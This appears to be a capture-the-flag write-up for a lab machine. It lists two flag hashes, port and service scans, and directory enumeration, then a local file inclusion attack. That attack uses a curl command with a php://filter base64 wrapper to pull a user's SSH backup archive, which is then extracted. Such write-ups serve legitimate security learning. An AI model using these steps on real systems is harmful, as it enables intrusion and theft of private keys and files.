FLAG79

3ca569f9d5bc771b0457c4f4d42d29c4824e8d70

FLAG80

75a60cd346351234ecb8348d7c1da94dac75fc4c

Enumeration

rustscan -a 10.150.150.55

PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
1055/tcp open  ansyslmd     syn-ack

nmap -sC -sV 10.150.150.55 -p 21,80,139,445,1055

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              13 Jun 12  2020 test
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.66.66.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
1055/tcp open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 46m25s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-27T09:30:03
|_  start_date: N/A

gobuster dir -u 10.150.150.55 -w /usr/share/wordlists/dirb/common.txt -q -t 200

/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 1873] 
/info.php             (Status: 200) [Size: 69973]
/server-status        (Status: 403) [Size: 278]

dirb <http://10.150.150.55> /usr/share/wordlists/dirb/common.txt -X .php

---- Scanning URL: <http://10.150.150.55/> ----
+ <http://10.150.150.55/browser.php> (CODE:500|SIZE:0)                           
+ <http://10.150.150.55/index.php> (CODE:200|SIZE:1873)                          
+ <http://10.150.150.55/info.php> (CODE:200|SIZE:70051)

Exploitation

Since we only have our /index.php working, we can try to find something like http://10.150.150.55/index.php?path=/

Untitled

Seems like we can find something interesting in http://10.150.150.55/index.php?path=/home/sally/backup

We can use a strategy that learnt from HackTheBox Academy File Traversal

curl '<http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz>' | base64 -d > SSHArchiveBackup.tar.gz

The command above is to curl the file into base64 then decode into our local machine We then extract the file

tar -xvzf SSHArchiveBackup.tar.gz